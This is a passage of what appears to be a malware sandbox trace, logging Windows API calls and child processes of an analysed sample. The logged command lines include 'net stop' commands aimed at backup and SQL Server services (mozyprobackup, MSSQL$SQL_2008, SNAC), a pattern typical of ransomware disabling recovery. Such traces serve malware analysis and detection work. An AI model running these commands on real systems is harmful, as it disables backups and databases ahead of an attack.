lpNumberOfBytesWritten=0x1ff920, lpOverlapped=0x0) returned 0 [0216.043] LocalFree (hMem=0x454000) returned 0x0 [0216.043] GetFileType (hFile=0x26c) returned 0x3 [0216.043] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4562a8 [0216.043] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4562a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nE", lpUsedDefaultChar=0x0) returned 2 [0216.043] WriteFile (in: hFile=0x26c, lpBuffer=0x4562a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff920, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff920, lpOverlapped=0x0) returned 0 [0216.043] LocalFree (hMem=0x4562a8) returned 0x0 [0216.043] _ultow (in: _Dest=0x889, _Radix=2095440 | out: _Dest=0x889) returned="2185" [0216.043] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc4b338, nSize=0x800, Arguments=0xc49dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0216.043] GetFileType (hFile=0x26c) returned 0x3 [0216.043] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4562a8 [0216.043] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4562a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0216.043] WriteFile (in: hFile=0x26c, lpBuffer=0x4562a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ff92c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff92c, lpOverlapped=0x0) returned 0 [0216.043] LocalFree (hMem=0x4562a8) returned 0x0 [0216.043] GetFileType (hFile=0x26c) returned 0x3 [0216.043] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4562a8 [0216.043] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4562a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nE", lpUsedDefaultChar=0x0) returned 2 [0216.043] WriteFile (in: hFile=0x26c, lpBuffer=0x4562a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff92c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff92c, lpOverlapped=0x0) returned 0 [0216.043] LocalFree (hMem=0x4562a8) returned 0x0 [0216.044] NetApiBufferFree (Buffer=0x451c70) returned 0x0 [0216.044] NetApiBufferFree (Buffer=0x451c88) returned 0x0 [0216.044] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mozyprobackup /y" [0216.044] exit (_Code=2) Process: id = "350" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6732f000" os_pid = "0x570" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 523 os_tid = 0xbd4 Process: id = "351" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5ef3d000" os_pid = "0x6f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "350" os_parent_pid = "0x570" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 524 os_tid = 0xbf0 [0216.187] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff08 | out: lpSystemTimeAsFileTime=0x2cff08*(dwLowDateTime=0x4a0d58e0, dwHighDateTime=0x1d57a87)) [0216.187] GetCurrentProcessId () returned 0x6f8 [0216.187] GetCurrentThreadId () returned 0xbf0 [0216.187] GetTickCount () returned 0x116f99b [0216.188] QueryPerformanceCounter (in: lpPerformanceCount=0x2cff00 | out: lpPerformanceCount=0x2cff00*=33647219059) returned 1 [0216.188] GetModuleHandleA (lpModuleName=0x0) returned 0xad0000 [0216.188] __set_app_type (_Type=0x1) [0216.188] __p__fmode () returned 0x74eb31f4 [0216.188] __p__commode () returned 0x74eb31fc [0216.188] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xadffe6) returned 0x0 [0216.188] __getmainargs (in: _Argc=0xae9064, _Argv=0xae906c, _Env=0xae9068, _DoWildCard=0, _StartInfo=0xae9024 | out: _Argc=0xae9064, _Argv=0xae906c, _Env=0xae9068) returned 0 [0216.188] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.188] GetConsoleOutputCP () returned 0x1b5 [0216.188] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xae9080 | out: lpCPInfo=0xae9080) returned 1 [0216.189] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.191] sprintf_s (in: _DstBuf=0x2cfec0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0216.192] setlocale (category=0, locale=".437") returned="English_United States.437" [0216.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0216.194] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0216.194] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" [0216.194] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cfc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0216.194] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x70) returned 0x343c18 [0216.194] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0216.194] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfe90 | out: Buffer=0x2cfe90*=0x341c78) returned 0x0 [0216.194] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfe90 | out: Buffer=0x2cfe90*=0x341c90) returned 0x0 [0216.194] _fileno (_File=0x74eb2900) returned -2 [0216.194] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0216.195] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0216.195] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0216.195] _wcsicmp (_String1="config", _String2="stop") returned -16 [0216.195] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0216.195] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0216.195] _wcsicmp (_String1="file", _String2="stop") returned -13 [0216.195] _wcsicmp (_String1="files", _String2="stop") returned -13 [0216.195] _wcsicmp (_String1="group", _String2="stop") returned -12 [0216.195] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0216.195] _wcsicmp (_String1="help", _String2="stop") returned -11 [0216.195] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0216.195] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0216.195] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0216.195] _wcsicmp (_String1="session", _String2="stop") returned -15 [0216.195] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0216.195] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0216.195] _wcsicmp (_String1="share", _String2="stop") returned -12 [0216.195] _wcsicmp (_String1="start", _String2="stop") returned -14 [0216.195] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0216.195] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0216.195] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0216.195] _wcsicmp (_String1="accounts", _String2="MSSQL$SQL_2008") returned -12 [0216.195] _wcsicmp (_String1="computer", _String2="MSSQL$SQL_2008") returned -10 [0216.195] _wcsicmp (_String1="config", _String2="MSSQL$SQL_2008") returned -10 [0216.195] _wcsicmp (_String1="continue", _String2="MSSQL$SQL_2008") returned -10 [0216.195] _wcsicmp (_String1="cont", _String2="MSSQL$SQL_2008") returned -10 [0216.195] _wcsicmp (_String1="file", _String2="MSSQL$SQL_2008") returned -7 [0216.195] _wcsicmp (_String1="files", _String2="MSSQL$SQL_2008") returned -7 [0216.195] _wcsicmp (_String1="group", _String2="MSSQL$SQL_2008") returned -6 [0216.195] _wcsicmp (_String1="groups", _String2="MSSQL$SQL_2008") returned -6 [0216.195] _wcsicmp (_String1="help", _String2="MSSQL$SQL_2008") returned -5 [0216.195] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQL_2008") returned -5 [0216.195] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQL_2008") returned -1 [0216.195] _wcsicmp (_String1="pause", _String2="MSSQL$SQL_2008") returned 3 [0216.195] _wcsicmp (_String1="session", _String2="MSSQL$SQL_2008") returned 6 [0216.195] _wcsicmp (_String1="sessions", _String2="MSSQL$SQL_2008") returned 6 [0216.195] _wcsicmp (_String1="sess", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="share", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="start", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="stats", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="statistics", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="stop", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="time", _String2="MSSQL$SQL_2008") returned 7 [0216.196] _wcsicmp (_String1="user", _String2="MSSQL$SQL_2008") returned 8 [0216.196] _wcsicmp (_String1="users", _String2="MSSQL$SQL_2008") returned 8 [0216.196] _wcsicmp (_String1="msg", _String2="MSSQL$SQL_2008") returned -12 [0216.196] _wcsicmp (_String1="messenger", _String2="MSSQL$SQL_2008") returned -14 [0216.196] _wcsicmp (_String1="receiver", _String2="MSSQL$SQL_2008") returned 5 [0216.196] _wcsicmp (_String1="rcv", _String2="MSSQL$SQL_2008") returned 5 [0216.196] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQL_2008") returned 1 [0216.196] _wcsicmp (_String1="redirector", _String2="MSSQL$SQL_2008") returned 5 [0216.196] _wcsicmp (_String1="redir", _String2="MSSQL$SQL_2008") returned 5 [0216.196] _wcsicmp (_String1="rdr", _String2="MSSQL$SQL_2008") returned 5 [0216.196] _wcsicmp (_String1="workstation", _String2="MSSQL$SQL_2008") returned 10 [0216.196] _wcsicmp (_String1="work", _String2="MSSQL$SQL_2008") returned 10 [0216.196] _wcsicmp (_String1="wksta", _String2="MSSQL$SQL_2008") returned 10 [0216.196] _wcsicmp (_String1="prdr", _String2="MSSQL$SQL_2008") returned 3 [0216.196] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQL_2008") returned -9 [0216.196] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQL_2008") returned -1 [0216.196] _wcsicmp (_String1="server", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="svr", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="srv", _String2="MSSQL$SQL_2008") returned 6 [0216.196] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQL_2008") returned -1 [0216.196] _wcsicmp (_String1="alerter", _String2="MSSQL$SQL_2008") returned -12 [0216.196] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQL_2008") returned 1 [0216.196] _wcsupr (in: _String="MSSQL$SQL_2008" | out: _String="MSSQL$SQL_2008") returned="MSSQL$SQL_2008" [0216.196] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3454d8 [0216.199] GetServiceKeyNameW (in: hSCManager=0x3454d8, lpDisplayName="MSSQL$SQL_2008", lpServiceName=0xaeaaf0, lpcchBuffer=0x2cfe2c | out: lpServiceName="", lpcchBuffer=0x2cfe2c) returned 0 [0216.200] _wcsicmp (_String1="msg", _String2="MSSQL$SQL_2008") returned -12 [0216.200] _wcsicmp (_String1="messenger", _String2="MSSQL$SQL_2008") returned -14 [0216.200] _wcsicmp (_String1="receiver", _String2="MSSQL$SQL_2008") returned 5 [0216.200] _wcsicmp (_String1="rcv", _String2="MSSQL$SQL_2008") returned 5 [0216.200] _wcsicmp (_String1="redirector", _String2="MSSQL$SQL_2008") returned 5 [0216.200] _wcsicmp (_String1="redir", _String2="MSSQL$SQL_2008") returned 5 [0216.200] _wcsicmp (_String1="rdr", _String2="MSSQL$SQL_2008") returned 5 [0216.200] _wcsicmp (_String1="workstation", _String2="MSSQL$SQL_2008") returned 10 [0216.200] _wcsicmp (_String1="work", _String2="MSSQL$SQL_2008") returned 10 [0216.200] _wcsicmp (_String1="wksta", _String2="MSSQL$SQL_2008") returned 10 [0216.200] _wcsicmp (_String1="prdr", _String2="MSSQL$SQL_2008") returned 3 [0216.200] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQL_2008") returned -9 [0216.200] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQL_2008") returned -1 [0216.200] _wcsicmp (_String1="server", _String2="MSSQL$SQL_2008") returned 6 [0216.200] _wcsicmp (_String1="svr", _String2="MSSQL$SQL_2008") returned 6 [0216.200] _wcsicmp (_String1="srv", _String2="MSSQL$SQL_2008") returned 6 [0216.200] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQL_2008") returned -1 [0216.200] _wcsicmp (_String1="alerter", _String2="MSSQL$SQL_2008") returned -12 [0216.200] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQL_2008") returned 1 [0216.200] NetServiceControl (in: servername=0x0, service="MSSQL$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x2cfe28 | out: bufptr=0x2cfe28) returned 0x889 [0216.201] wcscpy_s (in: _Destination=0xaea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0216.201] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0216.202] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xaeb338, nSize=0x800, Arguments=0xae9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0216.203] GetFileType (hFile=0x26c) returned 0x3 [0216.203] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x344008 [0216.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x344008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0216.203] WriteFile (in: hFile=0x26c, lpBuffer=0x344008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2cfd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfd68, lpOverlapped=0x0) returned 0 [0216.203] LocalFree (hMem=0x344008) returned 0x0 [0216.203] GetFileType (hFile=0x26c) returned 0x3 [0216.203] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3462b0 [0216.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3462b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0216.203] WriteFile (in: hFile=0x26c, lpBuffer=0x3462b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfd68, lpOverlapped=0x0) returned 0 [0216.203] LocalFree (hMem=0x3462b0) returned 0x0 [0216.203] _ultow (in: _Dest=0x889, _Radix=2948504 | out: _Dest=0x889) returned="2185" [0216.203] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xaeb338, nSize=0x800, Arguments=0xae9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0216.203] GetFileType (hFile=0x26c) returned 0x3 [0216.203] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3462b0 [0216.203] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3462b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0216.203] WriteFile (in: hFile=0x26c, lpBuffer=0x3462b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2cfd74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfd74, lpOverlapped=0x0) returned 0 [0216.203] LocalFree (hMem=0x3462b0) returned 0x0 [0216.203] GetFileType (hFile=0x26c) returned 0x3 [0216.203] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3462b0 [0216.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3462b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0216.204] WriteFile (in: hFile=0x26c, lpBuffer=0x3462b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2cfd74, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2cfd74, lpOverlapped=0x0) returned 0 [0216.204] LocalFree (hMem=0x3462b0) returned 0x0 [0216.204] NetApiBufferFree (Buffer=0x341c78) returned 0x0 [0216.204] NetApiBufferFree (Buffer=0x341c90) returned 0x0 [0216.204] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" [0216.204] exit (_Code=2) Process: id = "352" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0xa34000" os_pid = "0x684" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SNAC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 525 os_tid = 0x4b8 Process: id = "353" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5b2ef000" os_pid = "0xb80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "352" os_parent_pid = "0x684" cmd_line = "C:\\Windows\\system32\\net1 stop SNAC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 526 os_tid = 0xbd8 [0216.345] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efcc4 | out: lpSystemTimeAsFileTime=0x1efcc4*(dwLowDateTime=0x4a2526a0, dwHighDateTime=0x1d57a87)) [0216.345] GetCurrentProcessId () returned 0xb80 [0216.345] GetCurrentThreadId () returned 0xbd8 [0216.345] GetTickCount () returned 0x116fa37 [0216.345] QueryPerformanceCounter (in: lpPerformanceCount=0x1efcbc | out: lpPerformanceCount=0x1efcbc*=33662956886) returned 1 [0216.345] GetModuleHandleA (lpModuleName=0x0) returned 0xe0000 [0216.345] __set_app_type (_Type=0x1) [0216.345] __p__fmode () returned 0x74eb31f4 [0216.345] __p__commode () returned 0x74eb31fc [0216.345] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xeffe6) returned 0x0 [0216.346] __getmainargs (in: _Argc=0xf9064, _Argv=0xf906c, _Env=0xf9068, _DoWildCard=0, _StartInfo=0xf9024 | out: _Argc=0xf9064, _Argv=0xf906c, _Env=0xf9068) returned 0 [0216.346] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.346] GetConsoleOutputCP () returned 0x1b5 [0216.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf9080 | out: lpCPInfo=0xf9080) returned 1 [0216.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.349] sprintf_s (in: _DstBuf=0x1efc7c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0216.349] setlocale (category=0, locale=".437") returned="English_United States.437" [0216.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0216.352] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0216.352] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SNAC /y" [0216.352] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1efa48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0216.352] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5c) returned 0x563bf0 [0216.352] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0216.352] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efc4c | out: Buffer=0x1efc4c*=0x561c50) returned 0x0 [0216.352] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efc4c | out: Buffer=0x1efc4c*=0x561c68) returned 0x0 [0216.352] _fileno (_File=0x74eb2900) returned -2 [0216.352] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0216.352] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0216.352] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0216.352] _wcsicmp (_String1="config", _String2="stop") returned -16 [0216.352] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0216.352] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0216.352] _wcsicmp (_String1="file", _String2="stop") returned -13 [0216.352] _wcsicmp (_String1="files", _String2="stop") returned -13 [0216.352] _wcsicmp (_String1="group", _String2="stop") returned -12 [0216.353] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0216.353] _wcsicmp (_String1="help", _String2="stop") returned -11 [0216.353] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0216.353] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0216.353] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0216.353] _wcsicmp (_String1="session", _String2="stop") returned -15 [0216.353] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0216.353] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0216.353] _wcsicmp (_String1="share", _String2="stop") returned -12 [0216.353] _wcsicmp (_String1="start", _String2="stop") returned -14 [0216.353] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0216.353] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0216.353] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0216.353] _wcsicmp (_String1="accounts", _String2="SNAC") returned -18 [0216.353] _wcsicmp (_String1="computer", _String2="SNAC") returned -16 [0216.353] _wcsicmp (_String1="config", _String2="SNAC") returned -16 [0216.353] _wcsicmp (_String1="continue", _String2="SNAC") returned -16 [0216.353] _wcsicmp (_String1="cont", _String2="SNAC") returned -16 [0216.353] _wcsicmp (_String1="file", _String2="SNAC") returned -13 [0216.353] _wcsicmp (_String1="files", _String2="SNAC") returned -13 [0216.353] _wcsicmp (_String1="group", _String2="SNAC") returned -12 [0216.353] _wcsicmp (_String1="groups", _String2="SNAC") returned -12 [0216.353] _wcsicmp (_String1="help", _String2="SNAC") returned -11 [0216.353] _wcsicmp (_String1="helpmsg", _String2="SNAC") returned -11 [0216.353] _wcsicmp (_String1="localgroup", _String2="SNAC") returned -7 [0216.353] _wcsicmp (_String1="pause", _String2="SNAC") returned -3 [0216.353] _wcsicmp (_String1="session", _String2="SNAC") returned -9 [0216.353] _wcsicmp (_String1="sessions", _String2="SNAC") returned -9 [0216.353] _wcsicmp (_String1="sess", _String2="SNAC") returned -9 [0216.353] _wcsicmp (_String1="share", _String2="SNAC") returned -6 [0216.353] _wcsicmp (_String1="start", _String2="SNAC") returned 6 [0216.353] _wcsicmp (_String1="stats", _String2="SNAC") returned 6 [0216.353] _wcsicmp (_String1="statistics", _String2="SNAC") returned 6 [0216.353] _wcsicmp (_String1="stop", _String2="SNAC") returned 6 [0216.353] _wcsicmp (_String1="time", _String2="SNAC") returned 1 [0216.353] _wcsicmp (_String1="user", _String2="SNAC") returned 2 [0216.353] _wcsicmp (_String1="users", _String2="SNAC") returned 2 [0216.354] _wcsicmp (_String1="msg", _String2="SNAC") returned -6 [0216.354] _wcsicmp (_String1="messenger", _String2="SNAC") returned -6 [0216.354] _wcsicmp (_String1="receiver", _String2="SNAC") returned -1 [0216.354] _wcsicmp (_String1="rcv", _String2="SNAC") returned -1 [0216.354] _wcsicmp (_String1="netpopup", _String2="SNAC") returned -5 [0216.354] _wcsicmp (_String1="redirector", _String2="SNAC") returned -1 [0216.354] _wcsicmp (_String1="redir", _String2="SNAC") returned -1 [0216.354] _wcsicmp (_String1="rdr", _String2="SNAC") returned -1 [0216.354] _wcsicmp (_String1="workstation", _String2="SNAC") returned 4 [0216.354] _wcsicmp (_String1="work", _String2="SNAC") returned 4 [0216.354] _wcsicmp (_String1="wksta", _String2="SNAC") returned 4 [0216.354] _wcsicmp (_String1="prdr", _String2="SNAC") returned -3 [0216.354] _wcsicmp (_String1="devrdr", _String2="SNAC") returned -15 [0216.354] _wcsicmp (_String1="lanmanworkstation", _String2="SNAC") returned -7 [0216.354] _wcsicmp (_String1="server", _String2="SNAC") returned -9 [0216.354] _wcsicmp (_String1="svr", _String2="SNAC") returned 8 [0216.354] _wcsicmp (_String1="srv", _String2="SNAC") returned 4 [0216.354] _wcsicmp (_String1="lanmanserver", _String2="SNAC") returned -7 [0216.354] _wcsicmp (_String1="alerter", _String2="SNAC") returned -18 [0216.354] _wcsicmp (_String1="netlogon", _String2="SNAC") returned -5 [0216.354] _wcsupr (in: _String="SNAC" | out: _String="SNAC") returned="SNAC" [0216.354] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5654a0 [0216.357] GetServiceKeyNameW (in: hSCManager=0x5654a0, lpDisplayName="SNAC", lpServiceName=0xfaaf0, lpcchBuffer=0x1efbe8 | out: lpServiceName="", lpcchBuffer=0x1efbe8) returned 0 [0216.358] _wcsicmp (_String1="msg", _String2="SNAC") returned -6 [0216.358] _wcsicmp (_String1="messenger", _String2="SNAC") returned -6 [0216.358] _wcsicmp (_String1="receiver", _String2="SNAC") returned -1 [0216.358] _wcsicmp (_String1="rcv", _String2="SNAC") returned -1 [0216.358] _wcsicmp (_String1="redirector", _String2="SNAC") returned -1 [0216.358] _wcsicmp (_String1="redir", _String2="SNAC") returned -1 [0216.358] _wcsicmp (_String1="rdr", _String2="SNAC") returned -1 [0216.358] _wcsicmp (_String1="workstation", _String2="SNAC") returned 4 [0216.358] _wcsicmp (_String1="work", _String2="SNAC") returned 